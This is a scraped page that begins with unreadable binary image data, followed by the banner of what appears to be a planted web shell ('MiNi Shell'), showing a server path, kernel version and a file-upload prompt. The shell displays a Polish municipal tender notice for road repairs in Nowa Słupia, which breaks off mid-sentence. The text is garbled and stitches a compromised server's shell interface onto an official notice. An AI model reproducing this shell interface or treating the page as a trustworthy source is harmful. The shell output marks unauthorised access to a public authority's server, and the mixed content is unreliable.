JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170324/51285-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.nowaslupia.bip.jur.pl (zakładka przetargi)' target='_blank'>http://www.nowaslupia.bip.jur.pl (zakładka przetargi)</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 51285 - 2017
              z dnia 2017-03-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nowa Słupia: Remont dróg na terenie Gminy Nowa Słupia
Część nr 1 Remont drogi gminnej Włochy  Hektary (dz. nr 403) od km 0+650 do km 1+162. 
Część nr 2 Remont drogi gminnej nr 352059T Baszowice od km 0+000 do km 0+360<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Nowa Słupia, krajowy numer identyfikacyjny
              ---, ul.
              ul. Rynek 
              15,
              26-006  
              Nowa Słupia, woj.
              świętokrzyskie, państwo
              Polska, tel.
              413 177 138, e-mail
              urzad@nowaslupia.pl, faks
              .
              <br />
              Adres strony internetowej (URL): www.nowaslupia.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.nowaslupia.bip.jur.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.nowaslupia.bip.jur.pl (zakładka przetargi)</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie za pośrednictwem operatora pocztowego, osobiście, za pośrednictwem posłańca<br />
                Adres:
                <br />Urząd Gminy Nowa Słupia ul. Rynek 15, 26 - 006 Nowa Słupia sekretariat - pokój nr 10</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont dróg na terenie Gminy Nowa Słupia
Część nr 1 Remont drogi gminnej Włochy  Hektary (dz. nr 403) od km 0+650 do km 1+162. 
Część nr 2 Remont drogi gminnej nr 352059T Baszowice od km 0+000 do km 0+360<br /><b>Numer referencyjny: </b>RIFS.ZP.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część nr 1 Remont drogi gminnej Włochy  Hektary (dz. nr 403) od km 0+650 do km 1+162. 
Przedmiotem inwestycji jest remont drogi gminnej Włochy  Hektary od km 0+650 do km 1+162, Gmina Nowa Słupia. Planowana długość remontowanego odcinka wynosi 512,0 mb, szerokość jezdni 3,0m. Droga w stanie istniejącym ma nawierzchnię z kruszywa. Zakres prac objęty niniejszą inwestycją: roboty pomiarowe, roboty ziemne, wymiana istniejącego przepustu, wzmocnienie podbudowy kruszywem, wykonanie warstwy wiążącej i ścieralnej z betonu asfaltowego, uzupełnienie poboczy kruszywem, uzupełnienie zjazdów kruszywem. Zakres prac obejmuje:
Roboty pomiarowe przy liniowych robotach ziemnych  trasa w terenie równinnym 0,512 km. Rozebranie mechaniczne nawierzchni z mieszanek mineralno  bitumicznych, o grubości 3 cm - 30m2. Usunięcie warstwy ziemi urodzajnej /humusu/ za pomocą spycharek, przy grubości warstwy: do 15 cm  512m2. Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,25 m3 z transportem urobku samochodami samowyładowczymi o ładowności do 5t, na odległość do 1 km: grunt kat. I-II, (wymiana podbudowy 25 m3, wymiana przepustu 50,0 m3, odtworzenie rowu 28,0 m3) 103 m3. Wywóz ziemi samochodami samowyładowczymi na odległość do 1 km, z załadowaniem i wyładowaniem gruntu kategorii: I-II  179,800 m3. Elementy przepustów rurowych pod zjazdami  ławy fundamentowe żwirowe 2,0 m3. Elementy przepustów rurowych pod zjazdami  ścianki czołowe dla rur o średnicy 60 cm  analogia  ścianki czołowe dla rur o średnicy 80 cm 2 szt. Elementy przepustów rurowych pod zjazdami  rury betonowe o średnicy 60 cm  analogia  przepust z rury PEHD spiralnie karbowanej o średnicy 80 cm  8 m. Naprawa dróg gruntowych wykonywana ręcznie: piaskiem  analogia  zasypka przepustu z piasku 44,0 m3. Formowanie nasypów o wysokości do 3,0 m spycharkami 55kW, z zagęszczeniem nasypu, z ziemi dostarczanej środkami transportu kołowego: grunt kat. I-II 44 m3. Ścieki uliczne z kamienia: narzutowego, na podsypce cementowo  piaskowej 10 m2. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni  kategoria gruntu: I-IV (512,0m*4,0m)  2048,0 m2. Warstwy odsączające w korycie lub na całej szerokości drogi  zagęszczenie mechaniczne: grubość warstwy po zagęszczeniu 10 cm (120,0 m2+100,0m2) 220,0m2. Warstwy odsączające w korycie lub na całej szerokości drogi  zagęszczenie mechaniczne: za każdy 1 cm grubości ponad 10 cm, krotność 5 (120,0m2+100,0m2) 220m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: 15 cm kruszywo sortowane frakcji 0-63,0mm (512,0m*4,0m) 2048,0m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: ponad 15 cm  dodatek za każdy dalszy 1 cm  krotność 5, kruszywo sortowane frakcji 0-31,5 mm (512,0m*4,0m) 2048 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa wiążąca po zagęszczeniu o grubości: 4 cm, mieszanka AC 16 W (512,0m*3,1m+15,0m2) 1602,2 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: 3 cm mieszanka AC 11 S (512,0m*3,0m+15,0m2) 1551,0m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: ponad 3 cm -  dodatek za każdy dalszy 1 cm  krotność 1, mieszanka AC 11 S (512,0m*3,0+15,0m2) 1 551m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: 7 cm mieszanka sortowana 0-31,5 mm  nawierzchnia zjazdów 30m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: ponad 7 cm  dodatek za każdy dalszy 1 cm  krotność 8, mieszanka sortowana 0-31,5 mm  nawierzchnia zjazdów 30,00 m2. Podbudowy z kruszywa łamanego  warstwa górna o grubości po zagęszczeniu: 8 cm  analogia  pobocza z kruszywa sortowanego 0-31,5 mm  512 m2.   
Część nr 2 Remont drogi gminnej nr 352059T Baszowice od km 0+000 do km 0+360.
Przedmiotem inwestycji jest remont drogi gminnej nr 352059 T Baszowice, dz. nr 292/1, 292/2 od km 0+000 do km 0+360, Gmina Nowa Słupia. Planowana długość remontowanego odcinka wynosi 360,00 mb, szerokości jezdni 3,0m. Droga w stanie istniejącym ma nawierzchnię z kruszywa i płyt betonowych. Zakres prac objęty niniejsza inwestycją: roboty pomiarowe, roboty ziemne, wymiana istniejącego przepustu, rozbiórka płyt drogowych, wykonanie warstwy odsączającej z piasku, wzmocnienie podbudowy kruszywem, wykonanie warstwy wiążącej i ścieralnej z betonu asfaltowego, uzupełnienie poboczy kruszywem, uzupełnienie zjazdów kruszywem. Zakres prac obejmuje: Roboty pomiarowe przy liniowych robotach ziemnych  trasa dróg w terenie równinnym 0,36 km. Rozebranie nawierzchni z płyt drogowych betonowych o grubości: 15 cm, z wypełnieniem spoin zaprawą cementową  odzyskanie materiału 848m2. Transport wewnętrzny na odległość do 20 km  prefabrykatów żelbetowych  analogia  transport płyt betonowych na odległość do 1 km  załadunek o rozładunek 311,3 t. Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,25 m3 z transportem urobku samochodami samowyładowczymi o ładowności do 5 t, na odległość do 1 km:  grunt kat. I-II  (wymiana przepustu 8,0 m3, - odtworzenie rowu 9,0 m3, - wymiana podbudowy 22.0 m3), 39 m3. Wywóz ziemi samochodami samowyładowczymi na odległość do 1 km, z załadowaniem i wyładowaniem gruntu kategorii: I-II 39m3. Elementy przepustów rurowych pod zjazdami  ławy fundamentowe żwirowe 1 m3. Elementy przepustów rurowych pod zjazdami  ścianki czołowe dla rur o średnicy 50 cm 2 szt. Elementy przepustów rurowych pod zjazdami  rury betonowe o średnicy 50 cm  analogia  przepust z rury PEHD spiralnie karbowanej o średnicy 50 cm 7m. Naprawa dróg gruntowych wykonywana ręcznie: piaskiem  analogia  zasypka przepustu z piasku 4 m3. Formowanie nasypów o wysokości do 3,0 m spycharkami 55kW, z zagęszczeniem nasypu, z ziemi dostarczanej środkami transportu kołowego: grunt kat. I-II 4 m3. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni  kategoria gruntu: I-IV (360m*4m+20m2) 1 460m2. Warstwy odsączające w korycie lub na całej szerokości drogi  zagęszczenie mechaniczne: grubość warstwy po zagęszczeniu 10 cm (148m*1m+212m*4+20m2) 1 016 m2. Warstwy odsączające w korycie lub na całej szerokości drogi po zagęszczenie mechaniczne: za każdy 1 cm grubości ponad 10 cm  krotność 5 (148m*1m)  148 m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: 15 cm kruszywo sortowane frakcji 0-63 mm (360m*4m+20m2) 1460 m2. Podbudowy z kruszywa łamanego  warstwa dolna o grubości po zagęszczeniu: ponad 15 cm  dodatek za każdy dalszy 1 cm  krotność 5 kruszywo sortowane frakcja 0-31,5 mm (360m*4m+20m2) 1460 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa wiążąca po zagęszczeniu o grubości: 4 cm mieszanka AC 16 W (360m*3,1m+15m2) 1131 m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: 3 cm, mieszanka AC 11 S (360m*3m+15m2) 1095m2. Nawierzchnia z mieszanek mineralno  asfaltowych, grysowych  warstwa ścieralna po zagęszczeniu o grubości: ponad 3 cm  dodatek za każdy dalszy 1 cm  krotność 1, mieszanka AC 11 S (360m*3m+15m2) 1095m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: 7 cm  nawierzchnia zjazdów mieszanka sortowana 0-31,5 mm  50 m2. Nawierzchnie z tłucznia kamiennego  warstwa górna z tłucznia o grubości po uwałowaniu: ponad 7 cm  dodatek za każdy dalszy 1 cm  krotność 8, mieszanka sortowana 0-31,5 mm  nawierzchnia zjazdów, 50 m2. Podbudowy z kruszywa łamanego  warstwa górna o grubości po zagęszczeniu 8 cm  analogia  pobocza z kruszywa sortowanego 0-31,5 mm 360 m2. Materiał pochodzący z rozbiórki, nadający się do ponownego wbudowania staje się własnością Zamawiającego (Wykonawca złoży taki materiał w miejscu wskazanym przez Zamawiającego).
Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:
a)	wykonywanie wykopów i nasypów sposobem mechanicznym,
b)	wykonywanie robót związanych z zagęszczaniem warstw konstrukcyjnych pod nawierzchnię drogi i poboczy
c)	wykonywanie robót budowlanych związanych z układaniem przepustów, 
d)	wykonywanie robót związanych z wykonaniem warstwy z betonu asfaltowego,

<br /><br /><b>II.5) Główny kod CPV: </b>45233120-6<br /><b> Dodatkowe kody CPV:</b>45111200-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa niniejszego warunku udziału w postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 roboty budowlane o wartości nie mniejszej niż 100 000,00 zł brutto każda polegające na budowie lub przebudowie lub rozbudowie lub remoncie drogi w ramach której zostały wykonane roboty budowlane w tym wykonanie nawierzchni asfaltowej. 2. Wykonawca musi wykazać dysponowanie osobami posiadającymi uprawnienia do kierowania robotami budowlanymi, w tym 1 osobę, która  pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia w specjalności drogowej. 3. Wykonawca wykaże, że dysponuje w szczególności następującym sprzętem: walec stalowy min. 8 t  1 szt., walec ogumiony  1 szt., rozkładarka masy  1 szt., skrapiarka  1 szt.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz narzędzi wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca, w terminie 3 dni od zamieszczenia przez Zamawiającego na stronie internetowej informacji, o której mowa w art. 86 ust. 5 Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Propozycja treści oświadczenia zostanie udostępniona na stronie internetowej Zamawiającego www.nowaslupia.bip.jur.pl wraz z informacją z otwarcia ofert. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. 3. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając wraz z ofertą 